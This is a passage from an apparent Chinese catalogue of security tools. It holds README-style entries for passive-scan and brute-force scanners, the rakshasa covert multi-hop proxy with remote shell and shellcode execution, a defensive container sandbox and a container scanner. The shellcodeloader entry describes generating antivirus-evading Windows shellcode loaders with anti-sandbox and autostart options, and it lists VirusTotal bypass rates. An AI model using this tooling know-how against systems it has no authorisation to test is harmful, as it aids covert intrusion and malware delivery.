需要人工渗透的同时后台进行被动扫描,到底是代理到burp还是被动扫描器? 19 | Q3: ...... 20 | ``` 21 | 22 | 该插件正是为了解决该问题,将`正常访问网站的流量`与`提交给被动扫描器的流量`分开,互不影响。 23 | 24 | ![流程图](https://github.com/c0ny1/passive-scan-client/raw/master/doc/process.png) 25 | 26 | ### 0x02 插件编译 27 | 28 | ``` 29 | mvn package 30 | ``` 31 | 32 | ### 0x03 插件演示 33 | 34 | 可以通过插件将流量转发到各种被动式扫描器中,这里我选`xray`来演示. 35 | 36 | ![动图演示](https://github.com/c0ny1/passive-scan-client/raw/master/doc/show.gif) 37 | 38 | 39 | ## 项目相关 40 | 41 | 42 | ## 最近更新 43 | 44 | #### [v0.3.1] - 2023-02-03 45 | 46 | **更新** 47 | - 添加url黑名单 48 | - 添加右键`Send to Passive Scan Client`手动转发 49 | 50 | 51 | -------------------------------------------------------------------------------- /detail/qscan.md: -------------------------------------------------------------------------------- 1 | ## qscan 2 | 3 | ![Language](https://img.shields.io/badge/Language-Go-blue) 4 | ![Author](https://img.shields.io/badge/Author-qi4L-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/qi4L/qscan.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.8-red) 7 | ![Time](https://img.shields.io/badge/Join-20250513-green) 8 | 9 | 10 |

一个速度极快的内网扫描器,具备端口扫描、协议检测、指纹识别,暴力破解,漏洞探测等功能。支持协议1200+,协议指纹10000+,应用指纹20000+,暴力破解协议10余种

11 | 12 |

中文文档 | English

13 | 14 | # 🚀 上手指南 15 | 16 | 📢 请务必花一点时间阅读此文档,有助于你快速熟悉JYso! 17 | 18 | 🧐 使用文档[Wiki](https://github.com/qi4L/qscan/wiki)。 19 | 20 | ✔ 下载最新版本的[Releases](https://github.com/qi4L/qscan/releases)。 21 | 22 | # 👍 特点 23 | 24 | + spy 模式极速遍历常见B段,比常见的一个一个遍历,快上很多倍; 25 | + 在精确识别端口的同时,又拥有极快的速度; 26 | + 线程池优化:减少内存分配和 GC 开销; 27 | + 模板缓存:减少重复构建; 28 | + 并行发送:榨干多核 CPU; 29 | + 批量处理:减少系统调用; 30 | + 并行处理管道: 接收、解析、处理三阶段并行,效率最大化; 31 | + 缓冲区优化: 增加 Channel 缓冲区,避免阻塞; 32 | 33 | # 和Fscan对比的优势 34 | 35 | + 同端口数,同线程数下的速度对比: 36 | 37 | QScan 38 | ![img.png](https://raw.githubusercontent.com/qi4L/qscan/master/assets/qscan速度.png) 39 | 40 | FScan 41 | ![img.png](https://raw.githubusercontent.com/qi4L/qscan/master/assets/FScan.png) 42 | 43 | 44 | ## 项目相关 45 | 46 | 47 | ## 最近更新 48 | 49 | 50 | -------------------------------------------------------------------------------- /detail/rakshasa.md: -------------------------------------------------------------------------------- 1 | ## rakshasa 2 | 3 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 4 | ![Author](https://img.shields.io/badge/Author-Mob2003-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/Mob2003/rakshasa.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.2.3-red) 7 | ![Time](https://img.shields.io/badge/Join-20230410-green) 8 | 9 | 10 | rakshasa是一个使用Go语言编写的强大多级代理工具,专为实现**多级代理**,**内网穿透**而设计。它可以在节点群里面任意两个节点之间转发TCP请求和响应,同时支持**socks5代理**,**http代理**,并且可以**引入外部http、socks5代理池,自动切换请求IP**。 11 | 12 | 节点之间使用内置证书的TLS加密TCP通讯,再叠加一层自定义秘钥的AES加密,可以在所有Go支持的平台使用。可以在你所有的的Windows和Linux服务器上搭建节点并组成节点群网络。 13 | 14 | 节点分为普通节点(node)与控制节点(fullnode) 15 | - 普通节点,无法控制其他节点进行代理、shell等操作 16 | - 控制节点,全功能节点 17 | 18 | ## 项目结构示例和截图 19 | [点击查看更多介绍](https://github.com/Mob2003/rakshasa/blob/main/readme/rakshasa%E9%A1%B9%E7%9B%AE%E8%AE%BE%E8%AE%A1.md) 20 | 21 | [win10+Proxifier实现内网穿透](https://github.com/Mob2003/rakshasa/blob/main/readme/rakshasa%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F--win10+Proxifier%E4%BD%BF%E7%94%A8%E6%A1%88%E4%BE%8B.md) 22 | 23 | ## 版本迭代 24 | - **v0.1.0** 2023-03-28 25 | - 首次发布 26 | - **v0.2.0** 2023-04-02 27 | - 更改为fullnode版本,fullnode为全功能版本可以控制别人也能被控 28 | - 增加node版本,去掉私钥,无法发起代理等关键操作,适合被控 29 | - 增加lite版本,在上面版本的基础上,精简cli交互与http代理池,体积缩小2mb 30 | - 优化节点连接逻辑,并且遍历网卡ip进行net.Dail,解决多网卡下,无法连接的问题 31 | - **v0.2.2** 2023-04-08 32 | - 增加http_proxy重连逻辑,节点掉线后重连http代理能够正常重连使用 33 | - 优化节点重连逻辑 34 | - 增加uuid选项,默认uuid使用网卡mac作为随机数种子,进行生成 35 | 36 | ## 编译与使用 37 | 38 | 生成新的证书,编译所有版本节点 39 | ```shell 40 | go run build.go -all 41 | ``` 42 | 43 | 编译所有版本节点(不更新证书) 44 | ```shell 45 | go run build.go -all -nocert 46 | ``` 47 | 48 | 生成覆盖证书 49 | ```shell 50 | go run build.go -gencert 51 | ``` 52 | 53 | 生成控制节点与普通节点 54 | ```shell 55 | go run build.go -fullnode 56 | ``` 57 | 58 | 只生成普通节点 59 | ```shell 60 | go run build.go -node 61 | ``` 62 | 63 | 证书保存在cert目录下,可以使用第三方工具生成,请使用RSA PKCS1-V1.5 64 | ```shell 65 | private.go --编译普通节点的时候要删除此文件 66 | private.pem --与public.pem对应的公钥私钥,普通节点不包含私钥 67 | public.pem 68 | server.crt --tls通讯证书 69 | server.key --tls通讯私钥 70 | ``` 71 | ## 版本区别 72 | 73 | | | fullnode | node|fullnode_lite|node_lite| 74 | | ---- | ---- |---- |---- |---- | 75 | |连接其他节点 | √ |√ |√ |√ | 76 | |启动本地socks5代理 | √ |√ |√ |√ | 77 | |启动本地http代理 | √ |√ |√ |√ | 78 | |启动多层代理 | √ |× |√ |× | 79 | |远程shell| √ |× |√ |× | 80 | |其他远程功能| √ |× |√ |× | 81 | | 交互式CLI | √ |√ |× |× | 82 | | check_proxy | √ |√ |× |× | 83 | 84 | 简单来讲 85 | - fullnode 完全版,能控制别人,也能被控 86 | - node 能连接其他节点,但是不能对其他节点操控,适合作为被控端 87 | - lite版本,精简掉cli和net/http,与一些debug的代码 88 | 89 | ## 使用图示 90 | ![image](https://user-images.githubusercontent.com/128351726/226882870-f4f3cbc0-61df-486c-afc0-511d87586402.png) 91 | 92 | 93 | ## 使用方法 94 | 95 | 96 | 97 | ### 启动一个带CLI节点 98 | 不带任何参数即可启动: 99 | ```shell 100 | d:\>rakshasa.exe 101 | start on port: 8883 102 | rakshasa> 103 | rakshasa>help 104 | 105 | Commands: 106 | bind 进入bind功能 107 | clear clear the screen 108 | config 配置管理 109 | connect 进入connect功能 110 | exit exit the program 111 | help display help 112 | httpproxy 进入httpProxy功能 113 | new 与一个或者多个节点连接,使用方法 new ip:端口 多个地址以,间隔 如1080 127.0.0.1:1081,127.0.0.1:1082 114 | ping ping 节点 115 | print 列出所有节点 116 | remoteshell 远程shell 117 | remotesocks5 进入remotesocks5功能 118 | shellcode 执行shellcode 119 | socks5 进入socks5功能 120 | 121 | 122 | rakshasa> 123 | ``` 124 | 请查阅[CLI使用说明](https://github.com/Mob2003/rakshasa/blob/main/readme/cli.md)了解详细信息 125 | 126 | ## 其他启动参数说明 127 | ### -nocli 128 | 在无法后台执行的情况下,启动一个不带 CLI 的节点: 129 | ```shell 130 | nohup /root/rakshasa -nocli > /root/rakshasa.log 2>&1 & 131 | #Linux下配合nohup后台执行 132 | ``` 133 | 134 | ### -p 端口 135 | 以指定端口启动: 136 | ```shell 137 | rakshasa -p 8883 138 | ``` 139 | 140 | ### -d ip:port,ip:port... 141 | 连接下一层代理或更多层代理,多个地址以逗号隔开,生效在最后一个 ip:port: 142 | ```shell 143 | rakshasa -d 192.168.1.1:8883,192.168.1.2:8883,192.168.1.3:8883 -socks5 1080 144 | #从本地1080端口启动一个socks5代理,流量通过三层转发ip最后在192.168.1.3请求目标数据 145 | ``` 146 | 147 | ### -socks5 用户名:密码@ip:端口 148 | 本地开启SOCKS5代理穿透到远程节点,可以不带-d: 149 | ```shell 150 | rakshasa -socks5 1080 151 | #不使用-d参数,则表示直接在本机启动一个socks5代理 152 | ``` 153 | 154 | 155 | 156 | ### -remotesocks5 端口 157 | 远程开启SOCKS5代理流量出口到本地: 158 | ```shell 159 | rakshasa -remotesocks5 1081 -d 192.168.1.2:1080,192.168.1.3:1080 160 | #方向从右往左(加上本机是3个节点),在192.168.1.3这台机器开启一个socks5端口1081,流量穿透到本地节点出去 161 | ``` 162 | 163 | ### -connect ip:port,remote_ip:remote_port 164 | 本地监听并转发到指定 IP 端口,使用场景为本机连接 teamserver,隐藏本机 IP: 165 | ```shell 166 | rakshasa -connect 127.0.0.1:50050,192,168,1,2:50050 -d 192.168.1.3:1080,192.168.1.4:1080 167 | #本机cs连接127.0.0.1:50050实际上通过1.3,1.4节点后,再连接到192.168.1.2:50050 teamserver,teamserver看到你的ip是最后一个节点的ip 168 | ``` 169 | 170 | ### -bind ip:port,remote_ip:remote_port 171 | 反向代理模式,必须配合-d使用: 172 | ```shell 173 | rakshasa -bind 192.168.1.2:50050,0,0,0.0:50050 -d 192.168.1.3:1080,192.168.1.4:1080 174 | #与上面相反,在最右端节点监听端口50050,流量到本机节点后,最终发往192.168.1.2,最终上线ip为本机ip 175 | ``` 176 | ### -http_proxy 用户名:密码@ip:端口 177 | 启动一个http代理,可以不使用-d,建议配合-http_proxy_pool使用代理池,自动切换代理ip: 178 | ```shell 179 | rakshasa -http_proxy 8080 -http_proxy_pool out.txt 180 | ``` 181 | 182 | ### -password 密钥 183 | 各节点除了证书校验之外,还额外支持密钥连接,建议使用并定期更换密钥,以避免二进制泄露后被别人连上 184 | ```shell 185 | rakshasa -password 123456 186 | ``` 187 | 188 | 189 | ### -f yaml文件 [详细说明](https://github.com/Mob2003/rakshasa/blob/main/readme/config.md) 190 | 指定配置文件启动。 191 | 192 | ### -help 193 | 更多启动参数使用帮助 194 | 195 | 196 | ## 项目相关 197 | 198 | 199 | ## 最近更新 200 | 201 | #### [v0.2.3] - 2023-04-23 202 | 203 | **更新** 204 | - 优化一个连接失败可能会导致nil的bug 205 | - 修改一个nodeMap为sync.Map以减少代码里面lock的使用 206 | 207 | 208 | -------------------------------------------------------------------------------- /detail/scaninfo.md: -------------------------------------------------------------------------------- 1 | ## scaninfo 2 | 3 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 4 | ![Author](https://img.shields.io/badge/Author-华东360安服团队-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/redtoolskobe/scaninfo.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.1.0-red) 7 | ![Time](https://img.shields.io/badge/Join-20220316-green) 8 | 9 | 10 | 开源、轻量、快速、跨平台 的红队内外网打点扫描器 11 | 12 | ## 注意的点 13 | 14 | - 漏洞扫描的时候有时候最后几个任务会卡住,是因为ftp爆破模块,这个fscan也一样目前没有好的解决办法,后续更新.先阶段可以-eq 21跳过ftp,或者control+c 主动停止不影响结果保存。 15 | - 有时候扫外网的全端口会漏掉端口可以使用-n 指定线程为500,400,默认为900.网络好的话900-1000都是没有问题 16 | - 关于结果报告 xlsx 文件是当你control+c 主动停止或任务正常结束时才会写入。txt文件是实时写入。 17 | 18 | 19 | ## 项目说明 20 | 21 | > 为何有这个项目 22 | 23 | 在渗透测试的端口扫描阶段,相信很多人遇到的问题是nmap太慢,masscan不准确。难以在速度与准确度之间寻找一个平衡。 其实有个工具不错就是[TXPortMap](https://github.com/4dogs-cn/TXPortMap)。但是没有进度条当大量扫描的时候结果处理也太友好。 24 | 25 | 在内网这块[fscan](https://github.com/shadow1ng/fscan)算是一款很优秀的工具但也有一些问题,如端口扫描不支持服务识别等。 26 | 27 | 指纹这块[EHole](https://github.com/EdgeSecurityTeam/EHole)也算一款很优秀的工具 28 | 29 | ## 如何解决这个问题 30 | 31 | - scaninfo 专门解决上述问题并对上述项目代码进行了优化与重构,快速的端口扫描和服务识别比masscan更快。 32 | 33 | - 包含fscan的绝大部份功能除了poc扫描和自定义字典 34 | 35 | - 更好的web探测与指纹识别 36 | 37 | - 更好的报告输出 38 | 39 | ## 使用说明 40 | 41 | ![image-20211105132301924](https://github.com/redtoolskobe/scaninfo/raw/main/infoscan.assets/image-20211105132301924.png) 42 | 43 | > 常见的参数 44 | 45 | ```shell 46 | scaninfo -uf url.txt -m webfinger web指纹识别 47 | ``` 48 | 49 | ```shell 50 | scaninfo -i 192.168.0.0/24 -p 1-65535 -eq 53 -m port 端口扫描 51 | ``` 52 | 53 | ```shell 54 | scaninfo -i 192.168.0.0/24 -l ip.txt -uf url.txt -t1000 可以组合各种目标ip段ip文件url文件 55 | ``` 56 | 57 | ## 报告 58 | 59 | > 报告主要是直观的excel并对每一种类型进行分类。同时也会生成txt json格式的结果。 60 | 61 | ![image-20211105134827966](https://github.com/redtoolskobe/scaninfo/raw/main/infoscan.assets/image-20211105134827966.png) 62 | 63 | ![image-20211105134954709](https://github.com/redtoolskobe/scaninfo/raw/main/infoscan.assets/image-20211105134954709.png) 64 | 65 | ## 参数 66 | 67 | > 主要参数 68 | 69 | | 参数 | 说明 | 70 | | ----- | -------------------------------- | 71 | | -ei | 排除某IP | 72 | | -eq | 排除某端口 | 73 | | -l | 指定IP文件 | 74 | | -uf | 指定要web指纹识别的url文件 | 75 | | -ff | 指定指纹文件默认使用内置 | 76 | | -o | 指定保存的结果文件默认为result | 77 | | -p | 指定端口默认使用top100 | 78 | | -m | 指定扫描的模块默认为全部 | 79 | | -pt | 指定ping 探测存活的线程 | 80 | | -vt | 指定web指纹扫描的线程默认500 | 81 | | -n | 指定端口扫描的线程默认900 | 82 | | -show | 查看扫描支持的模块 | 83 | | -t | 端口扫描tcp连接的超时时间默认0.5 | 84 | | -np | 跳过存活探测 | 85 | 86 | > 模块说明 87 | 88 | | 模块 | 说明 | 89 | | --------- | ----------------------------------- | 90 | | ftp | ftp弱口令探测 | 91 | | ssh | ssh弱口令探测 | 92 | | smb | smb弱口令探测 | 93 | | mssql | mssql弱口令探测 | 94 | | mysql | mysql弱口令探测 | 95 | | mgo | mongodb弱口令探测 | 96 | | redis | redis弱口令探测 | 97 | | psql | psql弱口令探测 | 98 | | ms17010 | ms17010探测 | 99 | | smbghost | smbghost探测 | 100 | | webfinger | web指纹识别 | 101 | | netbios | netbios探测,可以识别主机名发现域控 | 102 | | findnet | oxid | 103 | | all | 所有 | 104 | | port | 端口扫描 | 105 | | ping | ping 存活 | 106 | | mem | memcached弱口令 | 107 | 108 | 109 | 110 | ## 项目相关 111 | 112 | 113 | ## 最近更新 114 | 115 | 116 | -------------------------------------------------------------------------------- /detail/shellcodeloader.md: -------------------------------------------------------------------------------- 1 | ## shellcodeloader 2 | 3 | ![Language](https://img.shields.io/badge/Language-C++-blue) 4 | ![Author](https://img.shields.io/badge/Author-m0ngo0se@knownsec404-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/knownsec/shellcodeloader.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.1-red) 7 | ![Time](https://img.shields.io/badge/Join-20201125-green) 8 | 9 | 10 | 11 | # ShellcodeLoader 12 | 13 | Language: [English](https://github.com/knownsec/shellcodeloader/blob/master/Readme.md) 14 | 15 | Windows平台的shellcode免杀加载器。 16 | 17 | ## 功能特点 18 | 19 | 1. 自带多种加载方式。32位自带13种加载方式,64位自带12种加载方式。 20 | 21 | 2. 支持拓展。如果发现新的利用方式,按指定方式开发模板即可。 22 | 23 | 3. shellcode自动随机加密。使用时间为种子,生成128位密钥进行加密,相同shellcode出来的加载器的md5也不相同。 24 | 25 | 26 | 27 | ## 编译环境和方法 28 | 29 | 环境:生成器使用MFC实现UI,生成器和加载器模板均使用C++开发,VS2015静态编译。 30 | 31 | 方法:使用VS2015打开项目的解决方案(.sln),再进行编译即可。你也可以从[realse](https://github.com/knownsec/shellcodeloader/releases/)下载成品。 32 | 33 | 34 | 35 | ## 文件组成 36 | 37 | 本工具由生成器(shellcodeLoader.exe),和众多加载器模板组成。不同的加载器模板需放入对应位数的目录。并最终放入生成器同目录下的DATA目录。 38 | 39 | image-20201124160121278 40 | 41 | 42 | ## 使用方法 43 | 44 | 1. **打开生成器** 45 | 46 | ![image-20201124160202106](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124160202106.png) 47 | 48 | 49 | 50 | 2. **将想要加载的shellcode源文件(.bin)拖入该窗口** 51 | 52 | ![image-20201124160330548](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124160330548.png) 53 | 54 | 55 | 56 | 3. **勾选加载器的运行位数,并选择你需要的配置选项,是否需要自启动(自带方式皆为注册表方式自启动),是否需要反沙箱(64位下多数杀软不需要该选项即可免杀)** 57 | 58 | 59 | 60 | 4. **选择你想要的加载方式,不同位数下的加载方式会有不同,其取决于DATA目录下对应的加载器模板。** 61 | 62 | ![image-20201124160839607](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124160839607.png) 63 | 64 | 65 | 66 | 5. **点击生成,则会在桌面生成最终的加载器。** 67 | 68 | ![image-20201124161035698](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124161035698.png) 69 | 70 | ## 拓展方法 71 | 72 | 1. 在你新的模板源文件前包含public.hpp. 73 | 74 | 75 | 76 | 2. 调用GetShellcodeFromRes()函数获取shellcode信息,注意100不可更改,除非你改了生成器中的资源序号。 77 | 78 | ![image-20201124162327193](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124162327193.png) 79 | 80 | 其返回shellcode的数据指针,并且,shellcodeSize就是shellcode的大小。多数情况下,这一步是不需要进行更改的,你可以在获取shellcode之后做任何事。 81 | 82 | 83 | 84 | 3. 按照你需要的方法加载shellcode,完成后进行编译(PS:请确保你进行了静态编译,且取消了调试符号链接). 85 | 86 | ![image-20201124162721783](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124162721783.png) 87 | 88 | 89 | 90 | 4. 将编译出来的文件进行指定命名,这里的命名就是UI上最终现实的加载方式名称,并将其后缀改为DAT,放入指DATA目录下指定位数的目录中,生成器会自动获取该加载方式。 91 | 92 | ![image-20201124162912373](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124162912373.png) 93 | 94 | 95 | 96 | ### 关于public.hpp 97 | 98 | public.hpp源码中含有必要的注释。如果你想要其他的方式进行反沙箱,你可以更改antisandbox中的函数;如果你想要其他方式自启动,你可以更改autostart函数中的内容。其他函数体的内容多数情况下是不需要更改的。 99 | 100 | 101 | 102 | ## 使用效果 103 | 104 | VT检测效果,均以CS原始shellcode,并不勾选反沙箱为例: 105 | 106 | | 加载方式 | 未绕过率 | 107 | | ------------------------ | -------- | 108 | | CreateThreadpoolWait加载 | 3/72 | 109 | | Fiber加载 | 4/72 | 110 | | NtTestAlert加载 | 5/70 | 111 | | SEH异常加载 | 2/72 | 112 | | TLS回调加载 | 28/71 | 113 | | 动态加载 | 1/72 | 114 | | 动态加载plus | 28/71 | 115 | | 系统call加载 | 1/69 | 116 | | APC注入加载 | 6/72 | 117 | | Early Brid APC注入加载 | 4/72 | 118 | | NtCreateSection注入加载 | 2/71 | 119 | | 入口点劫持注入加载 | 3/72 | 120 | | 线程劫持注入加载 | 6/72 | 121 | 122 | 在动态加载方式勾选反沙箱之后,结果如下: 123 | 124 | ![1fef278889c961331a185698c35d220](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/1fef278889c961331a185698c35d220.png) 125 | 126 | 127 | 128 | 使用该加载器bypass诺顿的智能防火墙出网拦截,并上线: 129 | 130 | ![image-20201124163815942](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124163815942.png) 131 | 132 | 133 | 134 | ## 项目相关 135 | 136 | 137 | ## 最近更新 138 | 139 | 140 | -------------------------------------------------------------------------------- /detail/vArmor.md: -------------------------------------------------------------------------------- 1 | ## vArmor 2 | 3 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 4 | ![Author](https://img.shields.io/badge/Author-bytedance-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/bytedance/vArmor.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.7.1-red) 7 | ![Time](https://img.shields.io/badge/Join-20230831-green) 8 | 9 | 10 | vArmor 是一个云原生容器沙箱系统,它借助 Linux 的 [AppArmor LSM](https://en.wikipedia.org/wiki/AppArmor), [BPF LSM](https://docs.kernel.org/bpf/prog_lsm.html) 和 [Seccomp](https://en.wikipedia.org/wiki/Seccomp) 技术实现强制访问控制器(即 enforcer),从而对容器进行安全加固。它可以用于增强容器隔离性、减少内核攻击面、增加容器逃逸或横行移动攻击的难度与成本。 11 | 12 | 您可以借助 vArmor 在以下场景对 Kubernetes 集群中的容器进行沙箱防护 13 | * 业务场景存在多租户(多租户共享同一个集群),由于成本、技术条件等原因无法使用硬件虚拟化容器(如 Kata Container) 14 | * 需要对关键的业务进行安全加固,增加攻击者权限提升、容器逃逸、横向渗透的难度与成本 15 | * 当出现高危漏洞,但由于修复难度大、周期长等原因无法立即修复时,可以借助 vArmor 实施漏洞利用缓解(具体取决于漏洞类型或漏洞利用向量。缓解代表阻断利用向量、增加利用难度) 16 | 17 | *注意:如果需要高强度的隔离方案,建议优先考虑使用硬件虚拟化容器(如 Kata Container)进行计算隔离,并借助 CNI 的 NetworkPolicy 进行网络隔离。* 18 | 19 | **vArmor 的特色** 20 | * **Cloud-Native**. vArmor 遵循 Kubernetes Operator 设计模式,用户可通过操作 [CRD API](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/) 对特定的 Workloads 进行加固。从而以更贴近业务的视角,实现对容器化微服务的沙箱加固。 21 | * **Multiple Enforcers**. vArmor 将 AppArmor、BPF、Seccomp 抽象为 Enforcer,并支持单独或组合使用,从而对容器的文件访问、进程执行、网络外联、系统调用等进行访问控制。 22 | * **Allow-by-Default**. vArmor 当前重点支持此安全模型。即只有显式声明的行为会被阻断,从而减少性能损失和增加易用性。 23 | * **Built-in Rules**. vArmor 提供了一系列开箱即用的内置规则。这些规则为 Allow-by-Default 安全模型设计,从而极大降低对用户专业知识的要求。 24 | * **Behavior Modeling**. vArmor 支持对工作负载进行行为建模。这可用于开发白名单安全策略、分析哪些内置规则可用于加固应用、指导工作负载的配置遵循权限最小化原则。 25 | * **Deny-by-Default**. vArmor 可以基于行为模型创建白名单安全策略,从而确保仅显式声明的行为被允许。 26 | 27 | vArmor 由字节跳动终端安全团队的 **Elkeid Team** 研发,目前该项目仍在积极迭代中。 28 | 29 | 30 | ## 文档 31 | 您可以访问 [varmor.org](https://varmor.org) 查看 vArmor 的文档。 32 | 33 | 👉 **[快速上手](https://www.varmor.org/docs/introduction#quick-start)** 34 | 35 | 👉 **[安装指引](https://www.varmor.org/docs/getting_started/installation)** 36 | 37 | 👉 **[使用手册](https://www.varmor.org/docs/getting_started/usage_instructions)** 38 | 39 | 👉 **[策略与规则](https://www.varmor.org/docs/guides/policies_and_rules)** 40 | 41 | 👉 **[性能说明](https://www.varmor.org/docs/guides/performance)** 42 | 43 | 44 | ## 贡献 45 | 感谢您有兴趣为 vArmor 做出贡献!以下是帮助您入门的一些步骤: 46 | 47 | ✔ 阅读并遵循社区[行为准则](https://github.com/bytedance/vArmor/blob/main/CODE_OF_CONDUCT.md). 48 | 49 | ✔ 阅读[开发指引](https://github.com/bytedance/vArmor/blob/main/docs/development_guide.md). 50 | 51 | ✔ 加入 vArmor [飞书群](https://applink.larkoffice.com/client/chat/chatter/add_by_link?link_token=ae5pfb2d-f8a4-4f0b-b12e-15f24fdaeb24&qr_code=true). 52 | 53 | 54 | ## 项目相关 55 | 56 | 57 | ## 最近更新 58 | 59 | #### [v0.7.1] - 2025-04-23 60 | 61 | **更新** 62 | - 修复了 procfs 中的路径匹配问题,以确保 FD 匹配正确 63 | - 修复了 disallow-load-bpf-via-setsockopt 规则中对合法 setsockopt 调用的错误拦截 64 | 65 | #### [v0.7.0] - 2025-02-27 66 | 67 | **新增** 68 | - 在 VarmorPolicy 和 VarmorClusterPolicy CRD 中添加了 AllowViolations 字段 69 | - AppArmor、BPF 和 Seccomp enforcers 支持观察模式 70 | - 在 debug 日志中将未被阻止的违规事件记录到 violence.log 文件中 71 | - 在 ArmorProfileModel CRD 中添加了 StorageType 字段 72 | - 在 ArmorProfileModel 资源的附加打印机列中添加了 STORAGE-TYPE 字段 73 | - 在启用行为建模功能时,将 emptyDir 数据卷挂载到 agent 和管理器 74 | - 当 ArmorProfileModel 对象超出限制时,管理器将行为数据和配置文件保存到数据卷内的本地文件中- agent 建模期间将审计数据缓存在数据卷中 75 | - 支持从管理器的接口导出完整的 ArmorProfileModel 对象 76 | - 管理器的所有接暴露在 /apis 路径 77 | - 添加了 --logFormat 命令行选项,并允许以 JSON 格式输出日志 78 | - 修改了 VarmorPolicy 和 VarmorClusterPolicy CRD 的 AppArmorRawRules 结构 79 | - 当遇到不符合标准的个人信息时强制定期更新 80 | - 当策略在 DefenseInDepth 模式下运行时,如果 ArmorProfileModel 对象的 StorageType 字段为 LocalDisk,则从本地文件加载配置文件 81 | - 添加了 --set jsonLogFormat.enabled=true 选项,用于将日志格式切换为 JSON 82 | 83 | **修复** 84 | - 如果 agent 不在容器中,readinessProbe 使用默认端口 6080 85 | - 当 agent 在容器中运行时,通过 varmor-classifier-svc 服务访问分类器 86 | - 增加了超时重试的等待时间 87 | - 将 trace 的日志级别从 3 切换到 2 88 | 89 | #### [v0.6.3] - 2025-02-19 90 | 91 | **更新** 92 | - 为 Seccomp enforcer 添加了 disallow-load-bpf-via-setsockopt 内置规则 93 | - 为 Seccomp enforcer 添加了 disallow-userfaultfd-creation 内置规则 94 | - 增加了状态报告超时重试的等待时间 95 | 96 | #### [v0.6.2] - 2024-12-27 97 | 98 | **更新** 99 | - 新增在行为建模过程中,将其 mnt ns id 添加到监视列表中 100 | - 优化当行为数据太大时直接返回 101 | - 添加了调试标志 102 | - 为 Seccomp 执行器添加了 disallow-load-all-bpf-prog 规则 103 | - 修复在安装 varmor 的命名空间中创建 varmor-classifier-svc 服务 104 | 105 | #### [v0.6.1] - 2024-12-20 106 | 107 | **更新** 108 | - 修复始终呈现代理环境变量 109 | - 升级 net 包以修复 CVE-2024-45338 110 | 111 | 112 | -------------------------------------------------------------------------------- /detail/veinmind-tools.md: -------------------------------------------------------------------------------- 1 | ## veinmind-tools 2 | 3 | ![Language](https://img.shields.io/badge/Language-Golang/Python-blue) 4 | ![Author](https://img.shields.io/badge/Author-长亭科技-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/chaitin/veinmind-tools.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V2.1.5-red) 7 | ![Time](https://img.shields.io/badge/Join-20220316-green) 8 | 9 | 10 | veinmind-tools 是由长亭科技自研,牧云团队孵化,基于 veinmind-sdk 打造的容器安全工具集 11 | 12 | veinmind, 中文名为问脉,寓意 容器安全见筋脉,望闻问切治病害。 旨在成为云原生领域的一剂良方 13 | 14 | 15 | 中文文档 | English 16 | 17 | ## 🔥 Demo 18 | ![](https://veinmind-cache.oss-cn-hangzhou.aliyuncs.com/img/scan.gif) 19 | 20 | 问脉已接入 openai, 可以使用 openai 对扫描的结果进行人性化分析,让您更加清晰的了解本次扫描发现了哪些风险。 21 | 22 | ![](https://veinmind-cache.oss-cn-hangzhou.aliyuncs.com/img/ai.png) 23 | 24 | ## 🕹️ 快速开始 25 | ### 1. 确保机器上正确安装 docker 26 | ``` 27 | docker info 28 | ``` 29 | ### 2. 安装 [veinmind-runner](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-runner) 镜像 30 | ``` 31 | docker pull registry.veinmind.tech/veinmind/veinmind-runner:latest 32 | ``` 33 | ### 3. 下载 [veinmind-runner](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-runner) 平行容器启动脚本 34 | ``` 35 | wget -q https://download.veinmind.tech/scripts/veinmind-runner-parallel-container-run.sh -O run.sh && chmod +x run.sh 36 | ``` 37 | ### 4. 快速扫描本地镜像/容器 38 | ``` 39 | ./run.sh scan [image/container] 40 | ``` 41 | ### 5. 使用 openAI 智能分析 42 | ``` 43 | ./run.sh scan [image/container] --enable-analyze --openai-token 44 | ``` 45 | > 注: 使用 openAI 时,请确保当前网络能够访问openAI 46 | > 平行容器启动时,需要手动通过 docker run -e http_proxy=xxxx -e https_proxy=xxxx 设置代理(非全局代理的场景下) 47 | 48 | ## 🔨 工具列表 49 | 50 | | 工具 | 功能 | 51 | |---------------------------------------------------------------------------|-------------------| 52 | | [veinmind-runner](https://github.com/chaitin/veinmind-tools/blob/master/veinmind-runner/README.md) | 扫描工具运行宿主 | 53 | | [veinmind-malicious]https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-malicious) | 扫描容器/镜像中的恶意文件 | 54 | | [veinmind-weakpass](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-weakpass) | 扫描容器/镜像中的弱口令 | 55 | | [veinmind-log4j2](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-log4j2) | 扫描容器/镜像中的log4j2漏洞 | 56 | | [veinmind-minio](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-minio) | 扫描容器/镜像中的minio漏洞 | 57 | | 